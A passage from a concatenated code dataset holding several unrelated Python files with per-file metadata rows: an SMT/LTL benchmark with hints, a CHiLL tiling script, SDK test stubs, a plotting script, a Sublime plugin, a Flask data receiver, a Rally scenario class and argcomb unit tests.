init = msat_make_and(menv, init,
msat_make_and(menv, i_geq_0,
msat_make_not(menv, inc_i)))
init = msat_make_and(menv, init, msat_make_gt(menv, l, zero))
# r' = r
trans = msat_make_equal(menv, x_r, r)
# i < l -> ((inc_i' & i' = i + 1) | (!inc_i' & i' = i)) & l' = l
i_lt_l = msat_make_lt(menv, i, l)
x_i_eq_i_p_1 = msat_make_and(menv, x_inc_i,
msat_make_equal(menv, x_i,
msat_make_plus(menv, i, one)))
x_i_eq_i = msat_make_and(menv, msat_make_not(menv, x_inc_i),
msat_make_equal(menv, x_i, i))
x_i_eq_i_p_1_or_i = msat_make_or(menv, x_i_eq_i_p_1, x_i_eq_i)
x_l_eq_l = msat_make_equal(menv, x_l, l)
x_i_eq_i_p_1_or_i_and_x_l_eq_l = msat_make_and(menv, x_i_eq_i_p_1_or_i,
x_l_eq_l)
trans = msat_make_and(menv, trans,
msat_make_impl(menv, i_lt_l,
x_i_eq_i_p_1_or_i_and_x_l_eq_l))
# i >= l -> i' = 0 & l' = l + 1 & !inc_i'
i_geq_l = msat_make_geq(menv, i, l)
x_i_eq_0 = msat_make_equal(menv, x_i, zero)
x_l_eq_l_p_1 = msat_make_equal(menv, x_l, msat_make_plus(menv, l, one))
x_i_eq_0_and_x_l_eq_l_p_1 = msat_make_and(menv,
msat_make_and(menv, x_i_eq_0,
x_l_eq_l_p_1),
msat_make_not(menv, x_inc_i))
trans = msat_make_and(menv, trans,
msat_make_impl(menv, i_geq_l,
x_i_eq_0_and_x_l_eq_l_p_1))
# (G F inc_i) -> ! G F r > i
G_F_x_i_gt_i = enc.make_G(enc.make_F(inc_i))
r_gt_i = msat_make_gt(menv, r, i)
n_G_F_r_gt_i = msat_make_not(menv, enc.make_G(enc.make_F(r_gt_i)))
ltl = msat_make_impl(menv, G_F_x_i_gt_i, n_G_F_r_gt_i)
return TermMap(curr2next), init, trans, ltl
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
i = mgr.Symbol("i", types.REAL)
r = mgr.Symbol("r", types.REAL)
l = mgr.Symbol("l", types.REAL)
inc_i = mgr.Symbol("inc_i", types.BOOL)
symbs = frozenset([i, r, l, inc_i])
x_i = symb_to_next(mgr, i)
x_r = symb_to_next(mgr, r)
x_l = symb_to_next(mgr, l)
x_inc_i = symb_to_next(mgr, inc_i)
res = []
n0 = mgr.Real(0)
n1 = mgr.Real(1)
loc0 = Location(env, mgr.GE(r, n0))
loc0.set_progress(1, mgr.Equals(x_r, r))
loc1 = Location(env, mgr.GE(r, n0))
loc1.set_progress(0, mgr.Equals(x_r, mgr.Plus(r, n1)))
h_r = Hint("h_r2", env, frozenset([r]), symbs)
h_r.set_locs([loc0, loc1])
res.append(h_r)
loc0 = Location(env, mgr.GE(r, n0), mgr.GE(i, n0),
stutterT=mgr.Equals(x_r, mgr.Plus(r, i)))
loc0.set_progress(1, mgr.Equals(x_r, r))
loc1 = Location(env, mgr.GE(r, n0))
loc1.set_progress(0, mgr.Equals(x_r, mgr.Plus(r, n1)))
h_r = Hint("h_r3", env, frozenset([r]), symbs)
h_r.set_locs([loc0, loc1])
res.append(h_r)
loc0 = Location(env, mgr.GE(l, n0))
loc0.set_progress(1, mgr.Equals(x_l, mgr.Plus(l, n1)))
loc1 = Location(env, mgr.GE(l, n0))
loc1.set_progress(2, mgr.Equals(x_l, l))
loc2 = Location(env, mgr.GE(l, n0))
loc2.set_progress(0, mgr.Equals(x_l, l))
h_l = Hint("h_l4", env, frozenset([l]), symbs)
h_l.set_locs([loc0, loc1, loc2])
res.append(h_l)
loc0 = Location(env, mgr.GE(i, n0))
loc0.set_progress(1, mgr.Equals(x_i, mgr.Plus(i, n1)))
loc1 = Location(env, mgr.GE(i, n0))
loc1.set_progress(0, mgr.Equals(x_i, i))
h_i = Hint("h_i2", env, frozenset([i]), symbs)
h_i.set_locs([loc0, loc1])
res.append(h_i)
stutter = mgr.Equals(x_i, i)
loc = Location(env, mgr.LE(i, n0), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_i, mgr.Minus(i, n1)))
h_i = Hint("h_i1", env, frozenset([i]), symbs)
h_i.set_locs([loc])
res.append(h_i)
loc0 = Location(env, mgr.GE(l, n0))
loc0.set_progress(1, mgr.Equals(x_l, mgr.Plus(l, n1)))
loc1 = Location(env, mgr.GE(l, n0))
loc1.set_progress(0, mgr.Equals(x_l, l))
h_l = Hint("h_l2", env, frozenset([l]), symbs)
h_l.set_locs([loc0, loc1])
res.append(h_l)
loc0 = Location(env, mgr.Not(inc_i))
loc0.set_progress(1, x_inc_i)
loc1 = Location(env, inc_i, stutterT=x_inc_i)
loc1.set_progress(0, mgr.Not(x_inc_i))
h_inc = Hint("h_inc3", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc0, loc1])
res.append(h_inc)
loc = Location(env, mgr.LE(r, n0))
loc.set_progress(0, mgr.Equals(x_r, mgr.Minus(r, n1)))
h_r = Hint("h_r1", env, frozenset([r]), symbs)
h_r.set_locs([loc])
res.append(h_r)
loc0 = Location(env, mgr.Not(inc_i))
loc0.set_progress(1, x_inc_i)
loc1 = Location(env, inc_i, stutterT=x_inc_i)
loc1.set_progress(2, mgr.Not(x_inc_i))
loc2 = Location(env, mgr.Not(inc_i))
loc2.set_progress(0, mgr.Not(x_inc_i))
h_inc = Hint("h_inc4", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc0, loc1, loc2])
res.append(h_inc)
loc0 = Location(env, mgr.Not(inc_i))
loc0.set_progress(1, x_inc_i)
loc1 = Location(env, inc_i)
loc1.set_progress(0, mgr.Not(x_inc_i))
h_inc = Hint("h_inc2", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc0, loc1])
res.append(h_inc)
stutter = mgr.Equals(x_i, i)
loc = Location(env, mgr.GE(i, n0), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_i, mgr.Plus(i, n1)))
h_i = Hint("h_i0", env, frozenset([i]), symbs)
h_i.set_locs([loc])
res.append(h_i)
loc0 = Location(env, mgr.GE(r, n0))
loc0.set_progress(1, mgr.Equals(x_r, r))
loc1 = Location(env, mgr.GE(r, n0))
loc1.set_progress(2, mgr.Equals(x_r, mgr.Plus(r, n1)))
loc2 = Location(env, mgr.GE(r, n0))
loc2.set_progress(0, mgr.Equals(x_r, r))
h_r = Hint("h_r4", env, frozenset([r]), symbs)
h_r.set_locs([loc0, loc1, loc2])
res.append(h_r)
loc = Location(env, mgr.GE(l, n0))
loc.set_progress(0, mgr.Equals(x_l, mgr.Plus(l, n1)))
h_l = Hint("h_l0", env, frozenset([l]), symbs)
h_l.set_locs([loc])
res.append(h_l)
loc = Location(env, mgr.Not(inc_i))
loc.set_progress(0, mgr.Not(x_inc_i))
h_inc = Hint("h_inc1", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc])
res.append(h_inc)
loc0 = Location(env, mgr.GE(i, n0), mgr.GE(l, n0),
stutterT=mgr.Equals(x_i, mgr.Plus(i, l)))
loc0.set_progress(1, mgr.Equals(x_i, mgr.Plus(i, n1)))
loc1 = Location(env, mgr.GE(i, n0))
loc1.set_progress(0, mgr.Equals(x_i, i))
h_i = Hint("h_i3", env, frozenset([i]), symbs)
h_i.set_locs([loc0, loc1])
res.append(h_i)
loc = Location(env, inc_i)
loc.set_progress(0, x_inc_i)
h_inc = Hint("h_inc0", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc])
res.append(h_inc)
loc0 = Location(env, mgr.GE(l, n0), mgr.GE(r, n0),
stutterT=mgr.Equals(x_l, mgr.Plus(l, r)))
loc0.set_progress(1, mgr.Equals(x_l, mgr.Plus(l, n1)))
loc1 = Location(env, mgr.GE(l, n0))
loc1.set_progress(0, mgr.Equals(x_l, l))
h_l = Hint("h_l3", env, frozenset([l]), symbs)
h_l.set_locs([loc0, loc1])
res.append(h_l)
return frozenset(res)
| 35.433566 | 89 | 0.625222 | [
"MIT"
] | EnricoMagnago/F3 | benchmarks/f3_wrong_hints_permutations/scaling_ltl_infinite_state/17-extending_bound_30.py | 10,134 | Python |
from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/fdtd-2d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/fdtd-2d/tmp_files/7353.c')
procedure('kernel_fdtd_2d')
loop(0)
known(' nx > 1 ')
known(' ny > 1 ')
tile(1,2,20,2)
tile(1,4,100,4)
tile(2,2,20,2)
tile(2,4,100,4)
tile(3,2,20,2)
tile(3,4,100,4)
| 23 | 116 | 0.722222 | [
"BSD-2-Clause"
] | LoopTilingBenchmark/benchmark | experiments/fdtd-2d/tmp_files/7353.py | 414 | Python |
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 9
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_2_2
from isi_sdk_8_2_2.models.cluster_firmware_status_node import ClusterFirmwareStatusNode # noqa: E501
from isi_sdk_8_2_2.rest import ApiException
class TestClusterFirmwareStatusNode(unittest.TestCase):
"""ClusterFirmwareStatusNode unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testClusterFirmwareStatusNode(self):
"""Test ClusterFirmwareStatusNode"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_2_2.models.cluster_firmware_status_node.ClusterFirmwareStatusNode() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 24.04878 | 109 | 0.730223 | [
"Unlicense"
] | Isilon/isilon_sdk_python | isi_sdk_8_2_2/test/test_cluster_firmware_status_node.py | 986 | Python |
from argparse import ArgumentParser
import enum
from pathlib import Path
from matplotlib import pyplot as plt
from matplotlib.lines import Line2D
import numpy as np
import yaml
import pandas as pd
METRICS = ['total_L1', '0_to10mm_L1', '10_to20mm_L1', 'above20mm_L1']
METRICS_TITLE = ['L1Loss', 'L1Loss in [0,10) mm', 'L1Loss in [10,20) mm', 'L1Loss above 20 mm']
def get_xticks(dir, trainer_ids):
mapping = {}
for trainer_id in trainer_ids:
if trainer_id in mapping.keys():
continue
config_path = dir / trainer_id / 'config.yml'
with open(config_path) as f:
config = yaml.safe_load(f)
ds_config = config['dataset_config']
nw_config = config['network_config']
dd = ds_config['depth_difference_threshold'] if 'depth_difference_threshold' in ds_config else 0
s = ds_config['scale_images']
ic = nw_config['initial_channels']
lr = nw_config['learning_rate']
lt = nw_config['loss_type']
o = nw_config['output_activation'] if 'output_activation' in nw_config else 'none'
sk = int(nw_config['skip_connections']) if 'skip_connections' in nw_config else 0
if lt == 'huber_loss':
lt = 'h'
elif lt == 'mean_l1_loss':
lt = 'l1'
elif lt == 'mean_l2_loss':
lt = 'l2'
if o == 'none':
o = 'n'
elif o == 'relu':
o = 'r'
base_title = f"dd{dd}_s{s}_ic{ic}_lr{lr}_l{lt}_o{o}_sk{sk}"
num_titles = [v.startswith(base_title) for v in mapping.values()].count(True)
title = base_title + f"_{num_titles}"
mapping[trainer_id] = title
return mapping
def generate_bar_plot(df):
df_grouped = df.groupby(['title', 'it_ot'])
df_grouped_mean = df_grouped.mean()
df_grouped_std = df_grouped.std()
_, ax = plt.subplots(1, len(METRICS), figsize=(10, 5))
for idx, metric in enumerate(METRICS):
df_mean = df_grouped_mean.get(metric).unstack()
df_std = df_grouped_std.get(metric).unstack()
df_mean.plot.bar(ax=ax[idx], yerr=df_std, use_index=False, ylim=(0, None))
ax[idx].set_title(METRICS_TITLE[idx], fontdict=dict(fontsize=9))
ax[idx].set_xticklabels(df_mean.index)
leg = ax[idx].legend(frameon=True, fontsize=8)
leg.set_title(None)
# leg.get_frame().set_alpha(None)
# leg.get_frame().set_facecolor((1, 1, 1, 0.5))
# leg.get_frame().set_edgecolor('black')
# leg.get_frame().set_linewidth(0.5)
def get_box_plot(df: pd.DataFrame):
def set_box_color(bp, color):
plt.setp(bp['boxes'], color=color)
plt.setp(bp['whiskers'], color=color)
plt.setp(bp['caps'], color=color)
plt.setp(bp['medians'], color=color)
# sort first N models by loss
N = 5 # 10
df_grouped = df.groupby(['title', 'it_ot'])
df_grouped_mean = df_grouped.median().unstack()
df_grouped_mean_metric = df_grouped_mean[METRICS[0]]
df_grouped_mean['metricDiff'] = df_grouped_mean_metric['output/target'] - df_grouped_mean_metric['input/target']
df_grouped_mean.sort_values(by=['metricDiff'], ascending=[True], inplace=True)
sorted_titles = df_grouped_mean.reset_index()['title'].iloc[:N].to_list()
df = df_grouped.filter(lambda x: x['title'].isin(sorted_titles).all())
# group by (title, it_ot) and create it/ot colors
df_grouped = df.groupby(['title', 'it_ot'])
it_colors = {
title: np.asarray(plt.get_cmap('tab20')((2 * idx + 1) / 20))
for idx, title in enumerate(sorted_titles) # without i/t pairs
}
ot_colors = {
title: np.asarray(plt.get_cmap('tab20')((2 * idx) / 20))
for idx, title in enumerate(sorted_titles) # without i/t pairs
}
fig, ax = plt.subplots(1, len(METRICS), figsize=(10, 4))
for plot_idx, metric in enumerate(METRICS):
width = 0.6
inner_space = width * 2/3
outer_space = 2
df_grouped_metric = df_grouped[metric].apply(list)
df_ot_grouped = df_grouped_metric.loc[:, 'output/target']
df_it_grouped = df_grouped_metric.loc[:, 'input/target']
for idx, title in enumerate(sorted_titles):
it_value = df_it_grouped.loc[title]
bp_it = ax[plot_idx].boxplot(it_value, positions=[idx * outer_space - inner_space],
sym='', widths=width)
set_box_color(bp_it, it_colors[title])
ot_value = df_ot_grouped.loc[title]
bp_ot = ax[plot_idx].boxplot(ot_value, positions=[idx * outer_space + inner_space],
sym='', widths=width)
set_box_color(bp_ot, ot_colors[title])
ax[plot_idx].tick_params(axis='x', which='both', bottom=False, top=False, labelbottom=False)
ax[plot_idx].set_title(METRICS_TITLE[plot_idx], fontdict=dict(fontsize=9))
ax[plot_idx].set_ylabel("mm", labelpad=2.0)
custom_legend_lines = [
Line2D([0], [0], color=color, lw=4)
for color in ot_colors.values()
]
fig.legend(custom_legend_lines, ot_colors.keys(), loc='upper right', ncol=(len(custom_legend_lines) // 4) + 1)
plt.tight_layout()
plt.subplots_adjust(wspace=0.3, top=0.75)
def main(args):
plot_bar = False
df = pd.read_json(args.eval_path, dtype={'model': str, 'epoch': str})\
# unsqueeze metrics list to rows
df = df.explode('metrics').reset_index()
# metrics dict to columns
df = df.drop('metrics', axis=1).join(pd.DataFrame(df.metrics.values.tolist())).drop('index', axis=1)
df.rename(columns={'it': 'input/target', 'ot': 'output/target'}, inplace=True)
# filter out trainer_ids
blacklisted_trainer_ids = ["1646936119.3354385", "1646987487.7802982", "1647161196.55366"]
df = df.loc[df['model'].apply(lambda x: x not in blacklisted_trainer_ids)]
df = df.set_index(['model', 'epoch'])
df = df.stack().to_frame(name='metrics')
df.index.set_names('it_ot', level=2, inplace=True)
df = df['metrics'].apply(pd.Series)
df = df.reset_index()
xticks = get_xticks(args.eval_path.parent, df['model'].to_list())
df.insert(0, 'title', df['model'].apply(lambda v: xticks[v]))
# df['title'] = df['title'] + "_" + df['epoch']
df = df.drop(['model', 'epoch'], axis=1)
if plot_bar:
generate_bar_plot(df)
else:
get_box_plot(df)
# plt.show()
plt.savefig(f"{args.eval_path.parent}/plt.png") # , bbox_inches='tight', pad_inches=0)
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("eval_path", type=Path)
main(parser.parse_args())
| 36.097297 | 116 | 0.628182 | [
"MIT"
] | alr-internship/self-supervised-depth-denoising | src/evaluate/plot_evaluation.py | 6,678 | Python |
from gosubl import gs
import os
import sublime_plugin
def _stx(v):
old = [
'GoSublime.tmLanguage',
'GoSublime-next.tmLanguage',
]
fn = 'Packages/GoSublime/syntax/GoSublime-Go.tmLanguage'
if not os.path.exists(gs.dist_path('syntax/GoSublime-Go.tmLanguage')):
return
stx = v.settings().get('syntax')
if stx:
name = stx.replace('\\', '/').split('/')[-1]
if name in old:
print('GoSublime: changing syntax of `%s` from `%s` to `%s`' % (
(v.file_name() or ('view://%s' % v.id())),
stx,
fn
))
v.set_syntax_file(fn)
class Ev(sublime_plugin.EventListener):
def on_load(self, view):
_stx(view)
def on_activated(self, view):
_stx(view)
| 20.424242 | 71 | 0.646884 | [
"MIT"
] | MiYogurt/my-sublimetext3-plugin | GoSublime/gssynforce.py | 674 | Python |
###########################################################################
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
targetableRemarketingListsListResponse_Schema = [{
'description': '',
'name': 'kind',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'nextPageToken',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'name':
'targetableRemarketingLists',
'type':
'RECORD',
'mode':
'REPEATED',
'fields': [
{
'description': '',
'name': 'accountId',
'type': 'INT64',
'mode': 'NULLABLE'
}, {
'name': 'active',
'type': 'BOOLEAN',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'advertiserId',
'type': 'INT64',
'mode': 'NULLABLE'
},
[{
'description': '',
'name': 'dimensionName',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'etag',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'id',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'kind',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'description': 'BEGINS_WITH, CONTAINS, EXACT, WILDCARD_EXPRESSION',
'name': 'matchType',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'value',
'type': 'STRING',
'mode': 'NULLABLE'
}], {
'description': '',
'name': 'description',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'id',
'type': 'INT64',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'kind',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'lifeSpan',
'type': 'INT64',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'listSize',
'type': 'INT64',
'mode': 'NULLABLE'
}, {
'description':
'REMARKETING_LIST_SOURCE_ADX, REMARKETING_LIST_SOURCE_DBM, '
'REMARKETING_LIST_SOURCE_DFA, REMARKETING_LIST_SOURCE_DFP, '
'REMARKETING_LIST_SOURCE_DMP, REMARKETING_LIST_SOURCE_GA, '
'REMARKETING_LIST_SOURCE_GPLUS, REMARKETING_LIST_SOURCE_OTHER,'
' REMARKETING_LIST_SOURCE_PLAY_STORE, '
'REMARKETING_LIST_SOURCE_XFP, REMARKETING_LIST_SOURCE_YOUTUBE',
'name':
'listSource',
'type':
'STRING',
'mode':
'NULLABLE'
}, {
'description': '',
'name': 'name',
'type': 'STRING',
'mode': 'NULLABLE'
}, {
'description': '',
'name': 'subaccountId',
'type': 'INT64',
'mode': 'NULLABLE'
}
]
}]
| 29.559701 | 79 | 0.434991 | [
"Apache-2.0"
] | quan/starthinker | starthinker/task/dcm_api/schema/targetableRemarketingListsListResponse.py | 3,961 | Python |
from flask import Flask, request, jsonify
from flask_jsonrpc import JSONRPC
# import json_to_db
import psycopg2
import sys
from obs import *
import config
app = Flask(__name__)
app.config.from_object(config.DevelopmentMaxConfig)
jsonrpc = JSONRPC(app,'/api')
sys.path.insert(0,app.config['SQL_PATH'])
from sql_methods import *
sys.path.insert(0,app.config['SCRIPTS_PATH'])
from file_utils import insert_history_to_file
@app.route('/')
def index():
return "Template to recieve data"
@app.route('/api/get_history', methods=['GET', 'POST'])
def get_history():
content = request.get_json(force=True)
insert_history_to_file(content, HISTORY_PATH)
return jsonify(content)
@app.route('/api/get_content', methods=['GET', 'POST'])
def get_content():
content = ("""{}""".format(request.get_json(force=True))).replace('\'','\"')
if content != "[]" and content:
if content[0] != '[':
content = '[' + content + ']'
content += '\n\n'
# print(content)
client.put(content)
return jsonify(content)
if __name__ == '__main__':
client = Client("127.0.0.1", 8181, app.config['DB'], app.config['USER'], app.config['PASSWORD'], app.config['HOST'], app.config['PORT'])
app.run(host='127.0.0.1', port= 5000)
# json_insert.to_csv('/Users/MaximZubkov/Desktop/Programming/Python/Python_Project/analysis/son.csv')
client.close() | 27.895833 | 137 | 0.705751 | [
"MIT"
] | ilvivl/Python_Project | server_data_tmp/app/local_server.py | 1,339 | Python |
# Copyright 2015: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from rally import osclients
from rally.task import scenario
# NOTE(boris-42): Shortcut to remove import of both rally.task.scenario and
# rally.plugins.openstack.scenario
configure = scenario.configure
class OpenStackScenario(scenario.Scenario):
"""Base class for all OpenStack scenarios."""
def __init__(self, context=None, admin_clients=None, clients=None):
super(OpenStackScenario, self).__init__(context)
if context:
api_info = {}
if "api_versions" in context.get("config", {}):
api_versions = context["config"]["api_versions"]
for service in api_versions:
api_info[service] = {
"version": api_versions[service].get("version"),
"service_type": api_versions[service].get(
"service_type")}
if "admin" in context:
self._admin_clients = osclients.Clients(
context["admin"]["credential"], api_info)
if "user" in context:
self._clients = osclients.Clients(
context["user"]["credential"], api_info)
if admin_clients:
if hasattr(self, "_admin_clients"):
raise ValueError(
"Only one of context[\"admin\"] or admin_clients"
" must be supplied")
self._admin_clients = admin_clients
if clients:
if hasattr(self, "_clients"):
raise ValueError(
"Only one of context[\"user\"] or clients"
" must be supplied")
self._clients = clients
def clients(self, client_type, version=None):
"""Returns a python openstack client of the requested type.
The client will be that for one of the temporary non-administrator
users created before the benchmark launch.
:param client_type: Client type ("nova"/"glance" etc.)
:param version: client version ("1"/"2" etc.)
:returns: Standard python OpenStack client instance
"""
client = getattr(self._clients, client_type)
return client(version) if version is not None else client()
def admin_clients(self, client_type, version=None):
"""Returns a python admin openstack client of the requested type.
:param client_type: Client type ("nova"/"glance" etc.)
:param version: client version ("1"/"2" etc.)
:returns: Python openstack client object
"""
client = getattr(self._admin_clients, client_type)
return client(version) if version is not None else client()
| 39.52381 | 78 | 0.616867 | [
"Apache-2.0"
] | LorenzoBianconi/rally | rally/plugins/openstack/scenario.py | 3,320 | Python |
"""Tests for ArgComb. """
# pylint: disable=unused-argument, unused-variable
from typing import Any, Callable
import pytest
from argcomb import And, Else, InvalidArgumentCombination, Not, Or, Xor, argcomb
def test_default() -> None:
"""Test the ``default`` parameter of :function:``argcomb.__init__``.
This test also serves to check the basic functionality of
``argcomb`` for different types of signature: normal arguments,
keyword only arguments, positional only arguments, or any
combination of the above.
"""
def test_func(
func: Callable[..., None], kw_only_count: int, pos_only_count: int
) -> None:
"""Test a given function ``f``. """
with pytest.raises(InvalidArgumentCombination):
func()
if pos_only_count == 0:
func(a=1)
func(a=1, b=1)
func(a=1, b=None)
with pytest.raises(InvalidArgumentCombination):
func(a=None, b=1)
if kw_only_count < 2:
func(1)
if kw_only_count < 2 and pos_only_count < 2:
func(1, b=1)
func(1, b=None)
with pytest.raises(InvalidArgumentCombination):
func(None, b=1)
if kw_only_count == 0:
func(1, 1)
func(1, None)
with pytest.raises(InvalidArgumentCombination):
func(None, 1)
if pos_only_count < 2:
with pytest.raises(InvalidArgumentCombination):
func(b=1)
@argcomb("a")
def f(a: Any = None, b: Any = None) -> None:
...
test_func(f, kw_only_count=0, pos_only_count=0)
@argcomb("a")
def g(a: Any = None, *, b: Any = None) -> None:
...
test_func(g, kw_only_count=1, pos_only_count=0)
@argcomb("a")
def h(*, a: Any = None, b: Any = None) -> None:
...
test_func(h, kw_only_count=2, pos_only_count=0)
@argcomb("a")
def i(a: Any = None, /, b: Any = None) -> None:
...
test_func(i, kw_only_count=0, pos_only_count=1)
@argcomb("a")
def j(a: Any = None, b: Any = None, /) -> None:
...
test_func(j, kw_only_count=0, pos_only_count=2)
@argcomb("a")
def k(a: Any = None, /, *, b: Any = None) -> None:
...
test_func(k, kw_only_count=1, pos_only_count=1)
def test_argument_specs() -> None:
"""Test providing specifications for arguments. """
@argcomb(a="b", c="d")
def f(a: Any = None, b: Any = None, c: Any = None, d: Any = None) -> None:
...
# 9 valid combinations
f()
f(d=1)
f(c=1, d=1)
f(b=1)
f(b=1, d=1)
f(b=1, c=1, d=1)
f(a=1, b=1)
f(a=1, b=1, d=1)
f(a=1, b=1, c=1, d=1)
# 7 invalid combinations
with pytest.raises(InvalidArgumentCombination):
f(c=1)
with pytest.raises(InvalidArgumentCombination):
f(b=1, c=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1, d=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1, c=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1, c=1, d=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1, b=1, c=1)
def test_value_dependent_specs() -> None:
"""Test specifications which depend on argument value. """
@argcomb(a={1: "b", 2: "c", 3: "d"})
def f(a: Any = None, b: Any = None, c: Any = None, d: Any = None) -> None:
...
# valid
f()
f(a=1, b=4)
f(a=2, c=5)
f(a=3, d=6)
f(a=1, b=4, c=5)
f(a=1, b=4, c=5, d=6)
f(a=1, b=4, d=6)
f(a=2, c=5, d=6)
f(a=4)
f(b=4, c=5)
f(d=6)
# invalid
with pytest.raises(InvalidArgumentCombination):
f(a=1, c=5)
with pytest.raises(InvalidArgumentCombination):
f(a=1, c=5, d=6)
with pytest.raises(InvalidArgumentCombination):
f(a=1)
with pytest.raises(InvalidArgumentCombination):
f(a=2, b=3)
with pytest.raises(InvalidArgumentCombination):
f(a=2, d=4)
with pytest.raises(InvalidArgumentCombination):
f(a=3, b=3, c=4)
with pytest.raises(InvalidArgumentCombination):
f(a=3)
def test_and() -> None:
"""Test ``And`` condition. """
@argcomb(And("a", "b"))
def f(a: Any = None, b: Any = None, c: Any = None) -> None:
...
# valid
f(a=1, b=2)
f(a=1, b=2, c=3)
# invalid
with pytest.raises(InvalidArgumentCombination):
f(a=1)
with pytest.raises(InvalidArgumentCombination):
f(b=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1, b=None)
with pytest.raises(InvalidArgumentCombination):
f(a=None, b=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1, c=1)
with pytest.raises(InvalidArgumentCombination):
f(b=1, c=1)
with pytest.raises(InvalidArgumentCombination):
f(c=1)
with pytest.raises(InvalidArgumentCombination):
f()
def test_or() -> None:
"""Test ``Or`` condition. """
@argcomb(Or("a", "b"))
def f(a: Any = None, b: Any = None) -> None:
...
# valid
f(a=1)
f(b=2)
f(a=1, b=2)
# invalid
with pytest.raises(InvalidArgumentCombination):
f()
def test_not() -> None:
"""Test ``Not`` condition. """
@argcomb(Not("a"))
def f(a: Any = None) -> None:
...
# valid
f()
# invalid
with pytest.raises(InvalidArgumentCombination):
f(a=1)
def test_xor() -> None:
"""Test ``Xor`` condition. """
@argcomb(Xor("a", "b", "c"))
def f(a: Any = None, b: Any = None, c: Any = None) -> None:
...
# valid
f(a=1)
f(b=1)
f(c=1)
# invalid
with pytest.raises(InvalidArgumentCombination):
f(a=1, b=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1, c=1)
with pytest.raises(InvalidArgumentCombination):
f(b=1, c=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1, b=1, c=1)
with pytest.raises(InvalidArgumentCombination):
f()
def test_else() -> None:
"""Test ``Else`` in value dependent specifications. """
@argcomb(a={1: "b", Else: "c"})
def f(a: Any = None, b: Any = None, c: Any = None) -> None:
...
# valid
f(a=2, c=1)
# invalid
with pytest.raises(InvalidArgumentCombination):
f(a=2, b=1)
def test_nested_condition() -> None:
"""Test a nested condition. """
@argcomb(Or(And("a", "b"), And("c", "d")))
def f(a: Any = None, b: Any = None, c: Any = None, d: Any = None) -> None:
...
# valid
f(a=1, b=1)
f(c=1, d=1)
f(a=1, b=1, c=1, d=1)
# invalid
with pytest.raises(InvalidArgumentCombination):
f(a=1)
with pytest.raises(InvalidArgumentCombination):
f(a=1, c=1)
with pytest.raises(InvalidArgumentCombination):
f()
def test_argument_named_default() -> None:
"""Test when an argument is named ``default``.
This collides with a positional only argument named ``default`` in
the ``argcomb`` signature, but as this is positional only this
should not matter.
"""
@argcomb(default="a")
def f(default: Any = None, a: Any = None) -> None:
...
f(a=1)
f(default=1, a=1)
with pytest.raises(InvalidArgumentCombination):
f(default=1)
def test_arguments_same_name() -> None:
"""Test that a warning is emitted when a function with two
identically named arguments. """
@argcomb(a="b")
def f(a: Any = None, /, b: Any = None, **kwargs: Any) -> None:
...
with pytest.warns(UserWarning):
f(1, 2, a=3) # pylint: disable=E1124
def test_default_arguments() -> None:
"""Test that default arguments are correctly recognised when they
are not ``None``. """
@argcomb(a="b")
def f(a: int = 1, b: int = 2) -> None:
...
# valid since ``a`` is the default value
f(a=1)
with pytest.raises(InvalidArgumentCombination):
# invalid since ``b`` is the default value
f(a=2, b=2)
def test_kwargs() -> None:
"""Test functionality when signature uses ``**kwargs``. """
@argcomb(a="b")
def f(**kwargs: Any) -> None:
...
f(a=1, b=1)
f(b=1, c=1)
with pytest.raises(InvalidArgumentCombination):
